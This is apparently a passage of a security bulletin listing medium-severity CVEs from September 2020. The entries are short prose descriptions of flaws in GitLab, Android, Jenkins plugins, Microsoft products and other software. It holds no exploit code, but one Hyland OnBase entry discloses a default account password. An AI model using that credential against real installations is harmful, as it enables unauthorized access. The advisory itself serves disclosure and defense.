    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Wiki was vulnerable to a parser attack that prohibits anyone from accessing the Wiki functionality through the user interface. 2020-09-14 4 CVE-2020-13311
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab runner versions before 13.1.3, 13.2.3 and 13.3.1. It was possible to make the gitlab-runner process crash by sending malformed queries, resulting in a denial of service. 2020-09-14 4 CVE-2020-13310
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8, and 13.3.4. An insufficient check in the GraphQL api allowed a maintainer to delete a repository. 2020-09-14 4 CVE-2020-13317
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was not invalidating project invitation link upon removing a user from a project. 2020-09-14 4 CVE-2020-13305
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. API Authorization Using Outdated CI Job Token 2020-09-14 5.5 CVE-2020-13284
    CONFIRM
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.0.12, 13.1.10, 13.2.8 and 13.3.4. GitLab's EKS integration was vulnerable to a cross-account assume role attack. 2020-09-14 4.9 CVE-2020-13318
    CONFIRM
    MISC
    gitlab -- gitlab GitLab before version 13.3.4 was vulnerable to an OAuth authorization scope change without user consent in the middle of the authorization flow. 2020-09-14 6.4 CVE-2020-13300
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. In certain cases an invalid username could be accepted when 2FA is activated. 2020-09-14 5.5 CVE-2020-13289
    CONFIRM
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab OAuth endpoint was vulnerable to brute-force attacks through a specific parameter. 2020-09-14 5 CVE-2020-13312
    CONFIRM
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was not revoking current user sessions when 2 factor authentication was activated allowing a malicious user to maintain their access. 2020-09-15 6 CVE-2020-13307
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab Omniauth endpoint allowed a malicious user to submit content to be displayed back to the user within error messages. 2020-09-14 5 CVE-2020-13314
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. The revocation feature was not revoking all session tokens and one could re-use it to obtain a valid session. 2020-09-14 5.5 CVE-2020-13299
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. When 2 factor authentication was enabled for groups, a malicious user could bypass that restriction by sending a specific query to the API endpoint. 2020-09-14 4.9 CVE-2020-13297
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab Webhook feature could be abused to perform denial of service attacks due to the lack of rate limitation. 2020-09-14 5 CVE-2020-13306
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Conan package upload functionality was not properly validating the supplied parameters, which resulted in limited file disclosure. 2020-09-14 5 CVE-2020-13298
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. The same 2 factor authentication secret code was generated, which allowed an attacker to maintain access under certain conditions. 2020-09-14 6.5 CVE-2020-13304
    CONFIRM
    MISC
    MISC
    gonitro -- nitro_pro An exploitable code execution vulnerability exists in the rendering functionality of Nitro Pro 13.13.2.242 and 13.16.2.300. When drawing the contents of a page and selecting the stroke color from an 'ICCBased' colorspace, the application will read a length from the file and use it as a loop sentinel when writing data into the member of an object. Due to the object member being a buffer of a static size allocated on the heap, this can result in a heap-based buffer overflow. A specially crafted document must be loaded by a victim in order to trigger this vulnerability. 2020-09-16 6.8 CVE-2020-6146
    MISC
    google -- android In hwservicemanager, there is a possible out of bounds write due to freeing a wild pointer. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-155646800 2020-09-18 4.6 CVE-2020-0273
    MISC
    google -- android An issue was discovered on LG mobile devices with Android OS 7.0, 7.1, 7.2, 8.0, and 8.1 software. Applications with sensitive security settings (such as the package verifier application) mishandle unknown-source installations. The LG ID is LVE-SMP-190002 (September 2020). 2020-09-11 5 CVE-2020-25281
    MISC
    google -- android In NFC, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-146453119 2020-09-18 4.6 CVE-2020-0326
    MISC
    google -- android In Bluetooth AVRCP, there is a possible leak of audio metadata due to residual data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-150214479 2020-09-18 5 CVE-2020-0286
    MISC
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2017.3 - 2020.2.4 and Gradle Enterprise Build Cache Node 1.0 - 9.2. Unrestricted HTTP header reflection allows remote attackers to obtain authentication cookies (if an XSS issue exists) via the /info/headers, /cache-info/headers, /admin-info/headers, /distribution-broker-info/headers, or /cache-node-info/headers path. 2020-09-18 5 CVE-2020-15768
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2018.5. There is a lack of lock-out after excessive failed login attempts. This allows a remote attacker to conduct brute-force guessing of a local user's password. 2020-09-18 5 CVE-2020-15770
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise before 2020.2.5. Lack of the secure attribute on the anti-CSRF cookie allows an attacker (with the ability to read HTTP traffic) to obtain a user's anti-CSRF token if the user initiates a cleartext HTTP request. 2020-09-18 4.3 CVE-2020-15767
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2018.2 - 2020.2.4. CSRF mitigation can be bypassed because the anti-CSRF token is in a cleartext cookie. 2020-09-18 6.8 CVE-2020-15776
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2020.2 - 2020.2.4. An XSS issue exists via the request URL. 2020-09-18 4.3 CVE-2020-15769
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2018.2 and Gradle Enterprise Build Cache Node 4.1. CSRF mitigation can be bypassed because cross-site transmission of a cookie (containing a CSRF token) can occur. 2020-09-18 5 CVE-2020-15771
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2018.5 - 2020.2.4. Because of implicitly remembered user-login information, physically proximate attackers can use a user session after browser closure. 2020-09-18 4.6 CVE-2020-15774
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2017.1 - 2020.2.4. Unrestricted access to a high-level system-usage summary allows an attacker to obtain project names and usage metrics. 2020-09-18 5 CVE-2020-15775
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise before 2020.2.4. Because of unrestricted cross-origin requests to read-only data in the Export API, an attacker can access data as a user (for the duration of the browser session) after previously explicitly authenticating with the API. 2020-09-18 4 CVE-2020-15773
    MISC
    CONFIRM
    gradle -- enterprise An issue was discovered in Gradle Enterprise 2018.5 - 2020.2.4. There is XXE with resultant SSRF via an uploaded SAML IDP configuration. 2020-09-18 4 CVE-2020-15772
    MISC
    CONFIRM
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. PKI certificates have a private key that is the same across different customers' installations. 2020-09-11 6.4 CVE-2020-25256
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. Client-side authentication is used for critical functions such as adding users or retrieving sensitive information. 2020-09-11 6.4 CVE-2020-25251
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. The server typically logs activity only when a client application specifies that logging is desired. This can be problematic for use cases in a regulated industry, where server-side logging is required in additional situations. 2020-09-11 5 CVE-2020-25249
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. It allows remote attackers to cause a denial of service (outage of connection-request processing) via a long user ID, which triggers an exception and a large log entry. 2020-09-11 5 CVE-2020-25255
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. CSRF can be used to log in a user, and then perform actions, because there are default credentials (the wstinol password for the manager or hsi account). 2020-09-11 6.8 CVE-2020-25252
    MISC
    ibm -- maximo_asset_management IBM Maximo Asset Management 7.6.0 and 7.6.1 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 171437. 2020-09-15 6.5 CVE-2019-4671
    XF
    CONFIRM
    ibm -- maximo_asset_management IBM Maximo Asset Management 7.6.0 and 7.6.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 182436. 2020-09-15 4.3 CVE-2020-4526
    XF
    CONFIRM
    ibm -- spectrum_protect_plus IBM Spectrum Protect Plus 10.1.0 through 10.1.6 Administrative Console could allow an authenticated attacker to upload arbitrary files which could be used to execute arbitrary code on the vulnerable server. This vulnerability is due to an incomplete fix for CVE-2020-4470. IBM X-Force ID: 187188. 2020-09-15 6 CVE-2020-4703
    XF
    CONFIRM
    ibm -- spectrum_protect_plus IBM Spectrum Protect Plus 10.1.0 through 10.1.6 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 187501. 2020-09-15 4 CVE-2020-4711
    XF
    CONFIRM
    inspircd -- inspircd An issue was discovered in InspIRCd 3 before 3.1.0. The silence module contains a use after free vulnerability. This vulnerability can be used for remote crashing of an InspIRCd server by any user able to fully connect to a server. 2020-09-11 6.8 CVE-2019-20918
    MISC
    MISC
    MISC
    inspircd -- inspircd An issue was discovered in InspIRCd 2 before 2.0.28 and 3 before 3.3.0. The mysql module contains a NULL pointer dereference when built against mariadb-connector-c 3.0.5 or newer. When combined with the sqlauth or sqloper modules, this vulnerability can be used for remote crashing of an InspIRCd server by any user able to connect to a server. 2020-09-11 6.8 CVE-2019-20917
    MISC
    MISC
    MISC
    MLIST
    DEBIAN
    inspircd -- inspircd An issue was discovered in InspIRCd 2 before 2.0.29 and 3 before 3.6.0. The pgsql module contains a use after free vulnerability. When combined with the sqlauth or sqloper modules, this vulnerability can be used for remote crashing of an InspIRCd server by any user able to connect to a server. 2020-09-11 6.8 CVE-2020-25269
    MISC
    MISC
    MISC
    MLIST
    DEBIAN
    istio-operator_project -- istio-operator An incorrect access control flaw was found in the operator, openshift-service-mesh/istio-rhel8-operator all versions through 1.1.3. This flaw allows an attacker with a basic level of access to the cluster to deploy a custom gateway/pod to any namespace, potentially gaining access to privileged service account tokens. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-16 6.5 CVE-2020-14306
    MISC
    MISC
    jenkins -- blue_ocean A missing permission check in Jenkins Blue Ocean Plugin 1.23.2 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL. 2020-09-16 4 CVE-2020-2255
    MLIST
    CONFIRM
    jenkins -- copy_data_to_workspace Jenkins Copy data to workspace Plugin 1.0 and earlier does not limit which directories can be copied from the Jenkins controller to job workspaces, allowing attackers with Job/Configure permission to read arbitrary files on the Jenkins controller. 2020-09-16 4 CVE-2020-2275
    MLIST
    CONFIRM
    jenkins -- elastest A cross-site request forgery (CSRF) vulnerability in Jenkins ElasTest Plugin 1.2.1 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials. 2020-09-16 4.3 CVE-2020-2273
    MLIST
    CONFIRM
    jenkins -- elastest A missing permission check in Jenkins ElasTest Plugin 1.2.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials. 2020-09-16 4 CVE-2020-2272
    MLIST
    CONFIRM
    jenkins -- email_extension Jenkins Email Extension Plugin 2.75 and earlier does not perform hostname validation when connecting to the configured SMTP server. 2020-09-16 5.8 CVE-2020-2253
    MLIST
    CONFIRM
    jenkins -- health_advisor_by_cloudbees Jenkins Health Advisor by CloudBees Plugin 3.2.0 and earlier does not correctly perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to view that HTTP endpoint. 2020-09-16 4 CVE-2020-2258
    MLIST
    CONFIRM
    jenkins -- mailer Jenkins Mailer Plugin 1.32 and earlier does not perform hostname validation when connecting to the configured SMTP server. 2020-09-16 5.8 CVE-2020-2252
    MLIST
    CONFIRM
    jenkins -- mongodb A missing permission check in Jenkins MongoDB Plugin 1.3 and earlier allows attackers with Overall/Read permission to gain access to some metadata of any arbitrary files on the Jenkins controller. 2020-09-16 4 CVE-2020-2267
    MLIST
    CONFIRM
    jenkins -- perfecto A missing permission check in Jenkins Perfecto Plugin 1.17 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified HTTP URL using attacker-specified credentials. 2020-09-16 4 CVE-2020-2260
    MLIST
    CONFIRM
    jenkins -- perfecto Jenkins Perfecto Plugin 1.17 and earlier executes a command on the Jenkins controller, allowing attackers with Job/Configure permission to run arbitrary commands on the Jenkins controller. 2020-09-16 6.5 CVE-2020-2261
    MLIST
    CONFIRM
    jenkins -- storable_configs Jenkins Storable Configs Plugin 1.0 and earlier allows users with Job/Read permission to read arbitrary files on the Jenkins controller. 2020-09-16 4 CVE-2020-2277
    MLIST
    CONFIRM
    jenkins -- storable_configs Jenkins Storable Configs Plugin 1.0 and earlier does not restrict the user-specified file name, allowing attackers with Job/Configure permission to replace any other '.xml' file on the Jenkins controller with a job config.xml file's content. 2020-09-16 4 CVE-2020-2278
    MLIST
    CONFIRM
    kaiostech -- kaios An issue was discovered in KaiOS 1.0, 2.5, and 2.5.12.5. The pre-installed Email application is vulnerable to HTML and JavaScript injection attacks. An attacker can send a specially crafted email to the victim that will inject HTML into the email application's UI as soon as the email is opened. At a bare minimum, this allows an attacker to take control over the Email application's UI (e.g., display a malicious prompt to the user asking them to re-enter their email credentials) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 4.3 CVE-2019-14756
    MISC
    kaiostech -- kaios An issue was discovered in KaiOS 2.5 and 2.5.1. The pre-installed Contacts application is vulnerable to HTML and JavaScript injection attacks. An attacker can send a vCard file to the victim that will inject HTML into the Contacts application (assuming the victim chooses to import the file). At a bare minimum, this allows an attacker to take control over the Contacts application's UI (e.g., display a malicious prompt to the user asking them to re-enter credentials such as their KaiOS credentials to continue using the application) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 4.3 CVE-2019-14757
    MISC
    MISC
    kaiostech -- kaios An issue was discovered in KaiOS 2.5 and 2.5.1. The pre-installed File Manager application is vulnerable to HTML and JavaScript injection attacks. An attacker can send a file via email to the victim that will inject HTML into the File Manager application (assuming the victim chooses to download the email attachment). At a bare minimum, this allows an attacker to take control over the File Manager application's UI (e.g., display a malicious prompt to the user asking them to re-enter credentials such as their KaiOS credentials to continue using the application) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 4.3 CVE-2019-14758
    MISC
    MISC
    kingsoft -- wps_office GdiDrawHoriLineIAlt in Kingsoft WPS Office before 11.2.0.9403 allows remote heap corruption via a crafted PLTE chunk in PNG data within a Word document. This is related to QBrush::setMatrix in gui/painting/qbrush.cpp in Qt 4.x. 2020-09-13 6.8 CVE-2020-25291
    MISC
    linux -- linux_kernel A race condition between hugetlb sysctl handlers in mm/hugetlb.c in the Linux kernel before 5.8.8 could be used by local attackers to corrupt memory, cause a NULL pointer dereference, or possibly have unspecified other impact, aka CID-17743798d812. 2020-09-13 4.4 CVE-2020-25285
    MISC
    MISC
    MISC
    linux4sam -- at91bootstrap AT91bootstrap before 3.9.2 does not properly wipe encryption and authentication keys from memory before passing control to a less privileged software component. This can be exploited to disclose these keys and subsequently encrypt and sign the next boot stage (such as the bootloader). 2020-09-14 6.4 CVE-2020-11684
    MISC
    MISC
    linux4sam -- at91bootstrap A timing side channel was discovered in AT91bootstrap before 3.9.2. It can be exploited by attackers with physical access to forge CMAC values and subsequently boot arbitrary code on an affected system. 2020-09-14 4.6 CVE-2020-11683
    MISC
    MISC
    mcafee -- email_gateway Path Traversal vulnerability in McAfee Email Gateway (MEG) prior to 7.6.406 allows remote attackers to traverse the file system to access files or directories that are outside of the restricted directory via external input to construct a path name that should be within a restricted directory. 2020-09-16 4 CVE-2020-7268
    MISC
    mcafee -- web_gateway Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user to delete or download protected log data via improper access controls in the user interface. 2020-09-15 4.1 CVE-2020-7295
    CONFIRM
    mcafee -- web_gateway Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user to delete or download protected files via improper access controls in the REST interface. 2020-09-15 4.1 CVE-2020-7294
    CONFIRM
    microchip -- atsama5d21c-cu_firmware CMAC verification functionality in Microchip Atmel ATSAMA5 products is vulnerable to timing and power analysis attacks. 2020-09-14 5 CVE-2020-12788
    MISC
    microchip -- atsama5d21c-cu_firmware The Secure Monitor in Microchip Atmel ATSAMA5 products uses a hardcoded key to encrypt and authenticate secure applets. 2020-09-14 4.3 CVE-2020-12789
    MISC
    microchip -- atsama5d21c-cu_firmware Microchip Atmel ATSAMA5 products in Secure Mode allow an attacker to bypass existing security mechanisms related to applet handling. 2020-09-14 4.3 CVE-2020-12787
    MISC
    microsoft -- 365_apps An information disclosure vulnerability exists when Microsoft Excel improperly discloses the contents of its memory, aka 'Microsoft Excel Information Disclosure Vulnerability'. 2020-09-11 4.3 CVE-2020-1224
    N/A
    microsoft -- 365_apps A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1338. 2020-09-11 6.8 CVE-2020-1218
    N/A
    microsoft -- 365_apps A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1218. 2020-09-11 6.8 CVE-2020-1338
    N/A
    microsoft -- asp.net_core A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names. The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded. The security update addresses the vulnerability by fixing the way the ASP.NET Core cookie parser handles encoded names, aka 'Microsoft ASP.NET Core Security Feature Bypass Vulnerability'. 2020-09-11 5 CVE-2020-1045
    FEDORA
    N/A
    microsoft -- dynamics_365 A remote code execution vulnerability exists in Microsoft Dynamics 365 (on-premises) when the server fails to properly sanitize web requests to an affected Dynamics server, aka 'Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16860. 2020-09-11 6.5 CVE-2020-16862
    N/A
    microsoft -- dynamics_365 A remote code execution vulnerability exists in Microsoft Dynamics 365 (on-premises) when the server fails to properly sanitize web requests to an affected Dynamics server, aka 'Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16862. 2020-09-11 6.5 CVE-2020-16860
    N/A
    microsoft -- dynamics_365_for_finance_and_operations A remote code execution vulnerability exists in Microsoft Dynamics 365 for Finance and Operations (on-premises) version 10.0.11, aka 'Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability'. 2020-09-11 6.5 CVE-2020-16857
    N/A
    microsoft -- edge A remote code execution vulnerability exists in the way that the IEToEdge Browser Helper Object (BHO) plugin on Internet Explorer handles objects in memory, aka 'Internet Explorer Browser Helper Object (BHO) Memory Corruption Vulnerability'. 2020-09-11 6.8 CVE-2020-16884
    N/A
    microsoft -- internet_explorer A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory, aka 'Microsoft Browser Memory Corruption Vulnerability'. 2020-09-11 5.1 CVE-2020-0878
    N/A
    microsoft -- internet_explorer An elevation of privilege vulnerability exists in the way that the Wininit.dll handles objects in memory, aka 'Windows Start-Up Application Elevation of Privilege Vulnerability'. 2020-09-11 6.8 CVE-2020-1506
    N/A
    microsoft -- internet_explorer An elevation of privilege vulnerability exists in the way that the Wininit.dll handles objects in memory, aka 'WinINet API Elevation of Privilege Vulnerability'. 2020-09-11 6.8 CVE-2020-1012
    N/A
    microsoft -- office An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory, aka 'Microsoft Office Information Disclosure Vulnerability'. 2020-09-11 4.3 CVE-2020-16855
    N/A
    microsoft -- sharepoint_enterprise_server A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. 2020-09-11 4.9 CVE-2020-1205
    N/A
    microsoft -- sharepoint_enterprise_server A remote code execution vulnerability exists in Microsoft SharePoint Server when it fails to properly identify and filter unsafe ASP.Net web controls, aka 'Microsoft SharePoint Server Remote Code Execution Vulnerability'. 2020-09-11 6.5 CVE-2020-1460
    N/A
    microsoft -- sharepoint_enterprise_server A tampering vulnerability exists when Microsoft SharePoint Server fails to properly handle profile data, aka 'Microsoft SharePoint Server Tampering Vulnerability'. This CVE ID is unique from CVE-2020-1523. 2020-09-11 4 CVE-2020-1440
    N/A
    microsoft -- sharepoint_server A tampering vulnerability exists when Microsoft SharePoint Server fails to properly handle profile data, aka 'Microsoft SharePoint Server Tampering Vulnerability'. This CVE ID is unique from CVE-2020-1440. 2020-09-11 4 CVE-2020-1523
    N/A
    microsoft -- sql_server_reporting_services A security feature bypass vulnerability exists in SQL Server Reporting Services (SSRS) when the server improperly validates attachments uploaded to reports, aka 'SQL Server Reporting Services Security Feature Bypass Vulnerability'. 2020-09-11 4 CVE-2020-1044
    N/A
    microsoft -- visual_studio An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector improperly handles data operations, aka 'Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1133. 2020-09-11 4.6 CVE-2020-1130
    N/A
    microsoft -- visual_studio An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector improperly handles file operations, aka 'Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1130. 2020-09-11 4.6 CVE-2020-1133
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Function Discovery SSDP Provider Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-0912
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that fdSSDP.dll handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1052, CVE-2020-1159. 2020-09-11 4.6 CVE-2020-1376
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1319. 2020-09-11 6.8 CVE-2020-1129
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Microsoft Store Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0766. 2020-09-11 4.6 CVE-2020-1146
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that the StartTileData.dll handles file creation in protected locations, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1052, CVE-2020-1376. 2020-09-11 4.6 CVE-2020-1159
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when Windows improperly handles objects in memory, aka 'Windows Remote Code Execution Vulnerability'. 2020-09-11 6.8 CVE-2020-1252
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that the Windows Function Discovery Service handles objects in memory, aka 'Windows Function Discovery Service Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1491
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows InstallService improperly handles memory. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows InstallService Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1532
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1303. 2020-09-11 6.8 CVE-2020-1169
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when Windows improperly handles calls to Win32k.sys, aka 'Windows Win32k Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1152
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1308. 2020-09-11 4.6 CVE-2020-1053
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory, aka 'Windows Common Log File System Driver Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1115
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Shell infrastructure component improperly handles objects in memory, aka 'Windows Shell Infrastructure Component Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1098
    N/A
    microsoft -- windows_10 A denial of service vulnerability exists when Windows Routing Utilities improperly handles objects in memory, aka 'Windows Routing Utilities Denial of Service'. 2020-09-11 4.9 CVE-2020-1038
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that the ssdpsrv.dll handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1159, CVE-2020-1376. 2020-09-11 4.6 CVE-2020-1052
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when Microsoft Windows CloudExperienceHost fails to check COM objects, aka 'Windows CloudExperienceHost Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1471
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory, aka 'Windows dnsrslvr.dll Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-0839
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that Microsoft COM for Windows handles objects in memory, aka 'Microsoft COM for Windows Elevation of Privilege Vulnerability'. 2020-09-11 6.8 CVE-2020-1507
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1091. 2020-09-11 4.3 CVE-2020-1097
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1097. 2020-09-11 4.3 CVE-2020-1091
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when Windows Media Audio Decoder improperly handles objects, aka 'Windows Media Audio Decoder Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1508. 2020-09-11 6.8 CVE-2020-1593
    N/A
    microsoft -- windows_10 A local elevation of privilege vulnerability exists in how splwow64.exe handles certain calls, aka 'Microsoft splwow64 Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-0790
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory, aka 'Windows UPnP Service Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1598
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. 2020-09-11 4.3 CVE-2020-1256
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists in how splwow64.exe handles certain calls, aka 'Microsoft splwow64 Information Disclosure Vulnerability'. 2020-09-11 4.3 CVE-2020-0875
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists in the way that the Windows Server DHCP service improperly discloses the contents of its memory. To exploit the vulnerability, an unauthenticated attacker could send a specially crafted packet to an affected DHCP server, aka 'Windows DHCP Server Information Disclosure Vulnerability'. 2020-09-11 5 CVE-2020-1031
    N/A
    microsoft -- windows_10 A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system. To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application. The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests, aka 'Windows Hyper-V Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-0904. 2020-09-11 4.9 CVE-2020-0890
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations, aka 'Windows Storage Services Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0886. 2020-09-11 4.6 CVE-2020-1559
    N/A
